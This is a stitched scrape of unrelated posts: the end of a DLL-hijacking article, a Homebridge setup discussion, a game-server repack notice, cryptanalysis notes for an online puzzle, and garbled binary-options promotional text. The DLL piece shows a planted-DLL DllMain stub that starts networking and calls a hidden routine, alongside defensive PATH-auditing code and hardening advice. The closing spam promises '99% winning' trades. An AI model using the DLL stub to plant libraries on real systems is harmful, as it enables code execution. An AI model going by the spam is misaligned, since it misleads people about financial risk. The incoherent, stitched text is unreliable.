DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: WSADATA WSAData; WSAStartup(MAKEWORD(2,0), &WSAData); InitMe(); break; case DLL_PROCESS_DETACH: break; } return TRUE; } 


Be careful about your %PATH%! Pay attention to 3rd party applications which may silently add a writable directory to this environment variable (especially if they install on the root drive), and don’t make the same mistake yourself.
Here is another quick and dirty piece of code in Python 2 to help you identify writable folders in your %PATH%, where any missing DLL could be planted by a bad guy:
import os import sys sysPath = "path" filetest = "\\inseminator.wperm" def is_writable(path): # Checking Write Permission try: filehandle = open(path, 'w') filehandle.close() os.remove(path) return True except IOError: return False print("[+] Searching for writable folders within %PATH%") try: require = os.environ[sysPath] except KeyError: sys.exit(" [-] Unrecoverable error: %" + sysPath.upper() + "% variable is not defined!") dicPath = os.environ[sysPath].split(";") WritablePath = [] for item in dicPath: if item: if is_writable(item + filetest): print " [-] Directory '" + item + "' is writable" WritablePath.append(item) 
If any writable directory is found, you should either remove it from the %PATH% or harden ACLs to ensure authenticated users (and any other untrusted accounts) are unable to write inside.
It is also advised to create some dummy DLL files in %WINDIR%, since this directory has a higher priority than PATH folders but is only queried if the searched libraries are not present in either the loading directory or %WINDIR%\System32 and %WINDIR%\System. At a bare minimum, it is advised to create those fake libraries if they do not exist on your system:
  • diagtrack_wininternal.dll
  • windowsperformancerecordercontrol.dll
  • diagtrack_win.dll
  • wlbsctrl.dll
To a lesser extent, it is also advised to create these dummy libraries:
  • mfebopa.dll
  • dcomp.dll
  • d3d8.dll
That’s all for today. Happy planting!
Frédéric BOURLA
submitted by TheFRoGito to hacking [link] [comments]

Discussion: Homebridge Guide? Lessons and Alternatives...

Facing the task of rebuilding my homebridge from scratch due to my own stupidity, I was curious if people here know of a good homebridge setup guide.
Obviously, there's no "one best way" to setup homebridge (which is a good thing!), but maybe we can discuss how people have done it here and how you would've done it differently.
It'll start:
My homebridge adventure started by trying to spin up a "raspberry pi/lightweight" optimized linux ISO as a VM (I have a multi-functional server I leave running for stuff like this) but after several attempts to get it running, I gave up and just decided to spin up an vanilla Ubuntu Server (v17) ISO and use that as a base. Why Ubuntu? That was the last distro that was "popular" the last time I really dealt with anything linux. Plus, with it's debian roots, I knew the package management was better (correct me if I'm wrong). Also I think it already had node pre-installed which made installing homebridge a little easier (but it also caused issues later on).
My plugins (which I added only one at a time, over a period of a year) were:
  1. homebridge-camera-ffmpeg: this was tricky as it required ffmpeg to get installed and I ran into some issues with all the dependencies for it. but eventually I got it working and hooked it into my ancient foscam 8910w's.
  2. homebridge-harmonyhub: I ran out and bought a harmony hub so that I could control my home theatre via siri. This was also tricky and required me to create a bunch of harmony activities that I can trigger with siri since a harmony activity = homekit switch. Some convoluted workarounds, and I had Siri turning up and down the volume and turning on the devices.
  3. Panasonic TV and Pioneer AV Reciever plugins: these were simple plugins that allowed me to turn OFF (not on) the TV and to turn on/off the reciever.
  4. SSH Switch: I setup an switch to run SSH commands on my router to turn on/off VPNs. This allowed me to say "hey siri, turn on/off US VPN". Handy when I needed to view geo-locked content.
  5. ecobee-sensors: This was a little more complicated setup and required some manual steps to add an API link to my Ecobee account. BUt this was handy to surface the ecobee sensors as occupancy sensors and trigger some light switch automations, and to surface the individual temperatures throughout the house
  6. Dummy switches: used to automate geofence smart locks without requiring the additional automation prompt.
  7. Dafang Camera: this is the one that did me in. I had the cheap dafang camera "working" but had some issues getting a reliable stream so after some mucking about, I completely hosed my homebridge setup. Probably due to upgrading ffmpeg and/or installing mongodb.
TL;DR: So are there some homebridge setups that are way out in left field? Share your experiences and what you would have done differently.
submitted by machineglow to homebridge [link] [comments]

Elysium Repack has been updated!

Just letting everyone know that as promised the repack has received it's monthly update.
Notable changes:
submitted by brotalnia to wowservers [link] [comments]

More info but nothing new solved

So I'm gonna dump some info I have gathered one more time. Nothing too cool. I hope you find it useful and maybe this helps to decrypt some of the messages! For now, it's all been failure on my end!

Decrypted posts:
F04_nod.redd -> Even though it's decrypted, I'm not sure. It may be a key for something

Some nice resources:
> Cryptography
> ARGs/internet mysteries/creepypastas

> Steganography

- Analysis of a plain english text encoded in base32 against the long message:
>>>>>>>>>>>>>>>>>>PLAIN ENGLISH ENCODED LEN -> 653 IC -> 0.0369 ###################################### D -> 38 (12.14) 3 -> 38 (12.14) H -> 36 (11.50) X -> 32 (10.22) R -> 30 (9.58) P -> 29 (9.27) 8 -> 29 (9.27) M -> 27 (8.63) F -> 27 (8.63) 9 -> 27 (8.63) ###################################### W7 -> 15 (16.48) D3 -> 11 (12.09) PM -> 11 (12.09) 3R -> 11 (12.09) BX -> 8 (8.79) C8 -> 7 (7.69) X3 -> 7 (7.69) RA -> 7 (7.69) HK -> 7 (7.69) E3 -> 7 (7.69) ###################################### 3RA -> 6 (13.33) X3R -> 5 (11.11) 3RK -> 5 (11.11) 9BX -> 5 (11.11) KM3 -> 4 (8.89) 3DE -> 4 (8.89) W7Z -> 4 (8.89) 8W7 -> 4 (8.89) 7ZH -> 4 (8.89) XE3 -> 4 (8.89) <<<<<<<<<<<<<<<<< - The first message has only 32 different characters (23456789ABCDEFGHJKLMNPQRSTUVWXYZ) in a message that is 695 chars long which suggest some sort of Base32 encoding
- The second message has 13 words of 13 letters with a charset of 36 (if we count the space) different characters.
Some of the characters here are not present in the first message (012345689ABCDEFGHIJKLMNOPQRSTUVWXYZ)
- Could this be a matrix for a Hill Cipher? ->
- "To help one is to help all" -> may come from the law of one by ra
+ How to attack this:
- One way the first message could be encrypted is by using a custom base32 alphabet
  1. Set a randomly sorted base32 alphabet
  2. Decrypt the encrypted message using it
  3. Check the fitness of the result
  4. Modify the alphabet
Seems straight forward. You can't check all alphabet permutations because 32! = 263130836933693530167218012160000000
What do then?
- Define transformations of the alphabet like swapping elements, sliding pieces of the alphabet, shuffle chunks,...
- Swap failing characters in the alphabet (those that decrypt to non-printable characters)
- Define a fitness function that depends on the english frequencies of bigrams, trigrams or quadgrams. Or maybe one based on the printability of the output
- If we assume that most of the characters are in the range A-Za-z then we can set a rule:
Let us analyze the first character of the string: V
V can be any number from 0 to 31... or can it? See, if we assume that the first character is a letter (which may not be the case if the original text is shuffled before the encryption), and also a capital letter (maybe it's the "T" from "To help ..."), then we have a couple of restrictions on what V can be. Ascii uppercase letters have values ranging from 0x41 (01000001) to 0x5a (01011010) so V's value must be 01---.
The catch here is the space character (' ' 0x20 00100000) which doesn't start with 01 and can be frequent in the text. Other punctuation symbols have similar issues.

- My best guess here is that this seemingly random chunk of html is to be hashed and a key generated from that, or used as-is as some sort of encryption key.
- Source of the chunk ->

- The easy solution that seems to be to easy to be a solution -> THEJUNGLEBOOK
- Notice it's 13 characters long (can this be used with other 13-char long strings that are present throughout the subreddit?)
- Tried to use this as an OTP key for the water_swift with no luck using either the numbers or the letters (I think I did this, but give it a try just in case I didn't do it or did it wrong)

- A mime with a broom. It might not be an original image but, if it isn't, I haven't been able to locate the original.
- Outguess returns that no bits are available when attempting to decrypt. This seems weird, but I don't know if it means something
- Most of the pictures seem to be related with other ARGs/internet mysteries/creepypastas
- On the side of the right shack, we can see on the roof a strange drawing and XY
+ How to attack this:
- It might have some hidden info so you can check steganography software like outguess and attempt to recover the hidden information bruteforcing the key with a list of words. Since we don't know wether there is information hidden (or even if reddit compresses the images when uploading them, which would kill any chance of hiding stuff in it), this might lead to nothing.

- Charset (57): 03456789BCDEFGHIJKLMNOPQRSTUVWXZabcdefghijklmnopqrsuvwxyz
- 13 characters per string, 13 strings
- This could be a table of keys.
+ How to attack?
- No idea. So start with the basics:
- Frequency analysis:
 ('0', 9), ('r', 8), ('b', 7), ('q', 6), ('m', 5), ('H', 5), ('J', 5), ('9', 5), ('8', 4), ('g', 4), ('a', 4), ('N', 4), ('x', 4), ('F', 4), ('V', 4), ('h', 3), ('j', 3), ('E', 3), ('S', 3), ('e', 3), ('O', 3), ('v', 3), ('C', 3), ('f', 3), ('z', 3), ('7', 3), ('n', 3), ('o', 3), ('X', 3), ('W', 3), ('d', 2), ('K', 2), ('Z', 2), ('k', 2), ('B', 2), ('G', 2), ('s', 2), ('y', 2), ('Q', 2), ('c', 2), ('T', 2), ('5', 2), ('p', 2), ('i', 2), ('R', 2), ('l', 2), ('3', 2), ('I', 2), ('L', 2), ('P', 1), ('D', 1), ('U', 1), ('w', 1), ('4', 1), ('6', 1), ('u', 1), ('M', 1) 
- A similar analysis as with the Paige12 post can be done.
- The fact that it's 31 different characters may come from the fact that the message is not very long or it may be that there are only 31 characters in the alphabet.
- It's likely that the top message uses the same alphabet
- In the top message not all words are the same length (13 - 6 - 12 - 6 - 13)

- Another chunk of html.
- A similar one ->
- Might be an old implementation of some sort of MM Chat ->
- 859 chars long

- 13 hexadecimal character
- This could be a One Time Pad (OTP). In this case what you do is you take a string that is also 13 chars long and xor each character with a 13 char long key. To decrypt, xor the encrypted result with the key.
+ How to attack:
- Take all 13 char long strings and xor them against this.
- The problem with OTP is that unless you know the key, you can make the text say anything you want by decrypting it with the right key:
>> Let's assume I want this to be THEJUNGLEBOOK. What I need to do is xor each character of the string with the encrypted message. That gives me c1 db ea 0c c3 71 22 83 a2 7d 61 79 4d. I can now use this to xor the encrypted message and get THEJUNGLEBOOK as plaintext

- A link to a section of oocities and a series of numbers and words. Will do a bot to check them sites!
Found omega in Found 1313 in Found allag in Found omega in Found omega in Found 1313 in Found omega in Found 1313 in Found 1313 in 
- This was found crawling only the main index. The bot may need to go deeper underground!
- The words are 13 13 omega allag weinstein challa g57
- g57 may be another medical code ->

- 20 8-letter strings
- It may use the same algorithm as the first post

- Another chunk of html (1507 chars)
- Seems to come from facebook somehow. Similar code ->
- A c program which outputs something like this:
1313 >> 20 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 
- >> indicates the input I gave it
- This could be used to sort some of the characters in the encrypted messages.
- The encryption could be just writing the characters in order and then take them out in columns. For example:
- We want to encrypt ATTACKATDAWN
- We lay the text according to this pyramid
- Extract the text by columns -> ATAAWTCTWKDA
- To decrypt, just lay the text in columns and enjoy. Combine this with some sort of substitution to reduce your sanity levels!
- A python implementation:
def main(): n, i, c, a = (1, 1, 1, 1) print('1313') # Will break if a string is input n = int(input()) # Since python's range goes [1,n) we need to increase n by 1 # we need to add one to the top limit for i in range(1, n+1): for c in range(1, i+1): print('%d ' % a, end='') a += 1 print() return 0 
- Here starts the shit. The encrypted text (if it is an encrypted message), not only plays with the different characters, but it also adds formatting to the equation. Is this important? Can I ignore italics and other such artifacts? Probably not. Probably not...

- This looks like substitution + transposition. Are the spaces moved around to? If not, how many combinations that make sense of a one-letter - two-letter pair are there in english?
- Give it a try with the program of the stockwood post
- Check them candidate algorithms:
> Vigenere
> Autokey
> Beaufort
> Running key
> Hill cipher
> ADFGVX cipher
> Playfair cipher
> Moar ->

- This one seems to be a variation of the f04cb algorithm.
- If we arrange the characters into columns every 3 bytes we get:
 3d 41 74 3c 42 73 38 43 73 3a 43 71 36 40 72 36 45 76 3c 40 76 3d 47 78 35 a9 75 38 41 71 39 a3 74 35 41 71 39 a5 78 35 a9 77 35 42 77 39 a5 72 3d 42 76 3a 44 5a 39 a6 73 36 40 76 3a 48 74 36 40 74 37 
- All characters in the left column start with 3 (0011)
- Almost all characters in the middle column start with 4 (0100)
- Almost all characters in the right column start with 7 (0111)
- The fact that it's almost all points to a operation done to the characters (like a xor) and not to half-bytes just being added in between half-bytes
- It is impossible to represent more than 16 characters with half a byte. This means that, in case the xor operation was the last one done, you can't know in advance where the positions of the 0s and 1s in the first half of the byte are going to be. You could have some sort of one time pad so that it produces this result, but this option seems unlikely
- Those characters that don't follow the pattern could correspond with special characters (like \r, \n, \t,...)
- Since 3 seems to have some sort of significance, it could be that the operations are done to groups of 3 bits (or 6, 13, pick a number!)

welcome to our new home
- Just a text. 32 characters long if we take the spaces into account

- Not your typical Lorem Ipsum. It starts with the standard "Lorem ipsum" but then changes.
- All the words seem to be in the post seem to be in the original post. Maybe this is a clue for the code.
Maybe the text can be translated into numbers according to the place of the word in the original text (first occurrence). Then, maybe those numbers can be used for something. Maybe.
- The tree in the title may be a clue to use the stockwood program

- As with all images, check with outguess or similar tools
- Original image ->

- The text seems to be some dummy text
- You can check this by searching for example "Gi tractare ut ex concilia" in google
- Where this text comes from is unknown
- A longer version ->
- Another reference to oocities
- The text is from Kafka's Metamorphosis ->
- It also seems to be used as dummy text for html templates

- Crossword picture. Could this be used as a template for letters in some of the previous text?
- Following are the clues with the length of each word in the crosswords
3 The OG (6)
5 Lake (4)
10 Brookfeld (3)
12 The first coming (14)
14 The Great SF64 (4)
15 Moose (8)
16 Prefix and begin (3)
17 Justic (4)
1 Ema (5)
2 VolumeX (9)
4 Fasttrack (3)
6 Meet You There (5)
7 Frame (10)
8 The Lost (7 or 6)
9 Pursuit (7 or 6)
11 Microphone (4)
12 IceRen (5)
13 Jacket (4)
- Please check that the words have been transcribed correctly

- Looks like one of those transposition + substition ciphers I heard so much about...
- That EAW, has it something to do with the Ema of the creations_puzzle.jpg?
+ How to attack
- Get frequencies of letters and bigrams
- Get the Index of Coincidence
- Depending on what comes out cry or attempt something different
- First, try key sizes of 6 and 13 as they seem to be important numbers
- Try to guess some of the words that can be there. The longer the better!
- When fail, crouch into fetal position and keep crying.
- A program?
 // # # # # # # # y=0 // # # . . . # # y=1 // # # . . . . # y=2 // # . . . . . # y=3 // # # . . . . # y=4 // # # . . . # # y=5 // # # # # # # # y=6 x2 = x - 1 + ((y + FirstShift) % 2); x3 = x + ((y + FirstShift) % 2); 
- If it is an % represents modulo, then the second part can only be 0 or 1
- x3 = x2 + 1
- There is also a list of numbers and a sentence
- Is the reference a shady reference to cicada?
- Is it a reference to one of the spinoffs of cicada?

- Charset (24): _'ABCDEFGHIKLMNOPRSTUVWY (the _ represents the space)
- It's 143 characters long. 143 = 13*11
- The IC matches that of english so it could be that only transposition has been used
- Individual frequencies also match those of english (more or less, but good enough for such a small text)
- At least it's a double transposition (maybe more)
- There are 24 spaces which suggest that the sentence is 25 words long
- The presence of ' indicates that there is a n't or 's (are there more possibilities?)
- We don't know the key size.
- Key lengths -> first I'll try 13 13, 6 13, 13 6, 4 20, 20 4 and see what happens
- Maybe the key is in one of the previous messages with long strings or even the jungle book one
+ How to attack?
- Assuming this is a double transposition, follow this -> chapter 5.3.1 (page 68)
- If it's more than double transposition, I think the same attack vector still holds
- Check also William Friedman's literature on the subject

- Here is the reference to 1976. It could be a reference to the paper by Diffie and Hellman
- All strings are 8 chars long except for the first and the last (6)

- No idea. Has a comment that looks like a perl script. Haven't tried to run it (it would need a couple of files)

I'm going to add a small explanation on baseN numbers
What is baseN?
A base32, base64, base10,... is just the number of different characters you use to represent a number.
For example
 base10 base2 base16 12 1100 0xc 

This can be interpreted as:
 12 -> 1 * 10^1 + 2 * 10^0 1100 -> 1 * 2^3 + 1 * 2^2 + 0 * 2^1 + 0 * 2^0 0xc -> c * 16 ^ 0 
In the case of base 16 we need more characters than just the numbers from 0-9 so we use a-f for the 10-15 range. In this example c = 12.
This is the basic idea. However when you check the standard base64 implementations you can see that the encoded string has sometimes padding characters (=). This is a consequence of how bytes are encoded into base64 to optimize the performance of the algorithm. In the standard case, each of the characters of the base64 alphabet ( from 0 (binary 000000) to 63 (binary 111111).
So when you encode a string like MESSAGE to base64 first you transform it into bits:
 M E S S A G E 01001101 01000101 01010011 01010011 01000001 01000111 01000101 
Then, group them into 6bit numbers:
 >> 010011 010100 010101 010011 010100 110100 000101 000111 010001 01 
We need to add 4 zeros to complete the 6 bits groups. To indicate this we will add 2 = chars to the end of the string
 >> 010011 010100 010101 010011 010100 110100 000101 000111 010001 010000 
If we encode this according to the base64 value table we get:
 010011 010100 010101 010011 010100 110100 000101 000111 010001 010000 T U V T U 0 F H R Q == 

submitted by averagetheposter to whatisada387 [link] [comments]

How I TRIPLED my Binary Options and DOUBLED Forex Accounts ... BINARY OPTIONS REVIEW - Best Binary Options Trading ... How To Blow Your Account In Binary Options - YouTube BINARY OPTIONS TRADING SYSTEM - REAL ACCOUNT - Binary ... Binary com options live trading account divergence ... Binary Option Real Account Tick Trading  99% Winning ...

Compare as contas de negociação de demonstração de opções binárias Por que usar uma conta de troca de demonstração de opções binárias Se vo... Top 10 Binary Option Robots: Binary Options Trading. There really should be no need to provide bank account details at this stage; if the platform is requesting this and you are (rightly) uncomfortable with it, there are plenty of other platforms out there that dont require this information so consider looking elsewhere. Binary Options Dummy Account. Rules are simple (that’s why many binary options dummy account traders prefer this type of trading) and there is a limited risk per trade. But, the issue is when you want to withdraw some profits. withdrawal process is not that difficult; depositing of funds into binary options trading is an easy process since the broker cannot refuse your funds. Anyone can trade binary options. Even a dummy can win any given binary trade, too. It is one or the other choice, it is hard to get it that wrong all of the time. However, to be a long term winner you have to develop a method and strategy that works for you. You have to consistently profit by winning more trades than you lose. Since there is risk involved, that means that you need to create a ... Overall, signing up for a demo account in binary or stock options, for example, could give you the ideal risk-free platform to develop an effective strategy. Drawbacks . Before you start looking at demo accounts for trading, these practice accounts do come with certain limitations: Physical Discrepancies. Execution – Demo accounts often provide better execution than live trading. This is ... If the binary options demo account link is not clearly posted on your broker of choices homepage, get in touch with their customer service department—they will guide you forward. Practice is always important before you trade with real money, even if you are going to use a trading service like Binary Options Robot. It gives you a more educated view of what you are doing, and this can only ... Here we list and compare the best binary options demo accounts with no deposit requirements 2020, and look at whether a free demo account really is ‘free’ and even where you can get a trial account with no sign up at all. When you trade binary options or CFDs products you are exposed to a high risk of loss. We review and rate companies offering trading platforms for binary options and CFDs. We do our best to warn people about scams and promote only companies we personally consider to be very good. From some of these companies, we may receive compensation. In order for you to use this website in any manner ... Iq option binary options download; Chỉ số dow jone; La verdad de las opciones binarias; शायरी; हिंदी जोक्स; वास्तु टिप्स; طريقة التداول في بورصة الكويت; वैलेंटाइन डे Welcome! Log into your account. your username. your password. Forgot your password? Get help. Password recovery. Recover your password. your email. A password will be e-mailed to you. Ciudadano. Ikili opsiyonda en sağlam taktikler; Coronavirus; Comercio social de opciones binarias demo ; Provinciales; Nacionales; Salud – Medio Ambiente; Gustavo Saenz; Home Sin categoría. Sin categoría ...

[index] [6266] [9338] [3225] [15313] [20991] [26443] [5459] [6456] [3935] [15888]

How I TRIPLED my Binary Options and DOUBLED Forex Accounts ...

Free signals group- Get 50% Instant Bonus Join- Contact- Join Free Signals Grou... Follow me on Instagram for Live Trades and Results: Awesome Oscillator + Moving Average Strategy: Open VIRTUAL money account - Secret Russian strategy binary options trading system - Free Iq Option Demo: ExpertOption: For EU & USA best broker: http://w... BINARY OPTIONS REVIEW - Best Binary Options Trading Strategy - Real Account ★ TRY STRATEGY HERE ★ WORK ON REAL MONEY http://iqopts... BINARY OPTIONS TRADING SYSTEM - REAL ACCOUNT - Binary Options Brokers ★ TRY STRATEGY HERE ★ WORK ON REAL MONEY Hi Friends I will Show This Video Binary Options 60 Seconds Indicator Signal 99% Winning Live Trading Proof -----...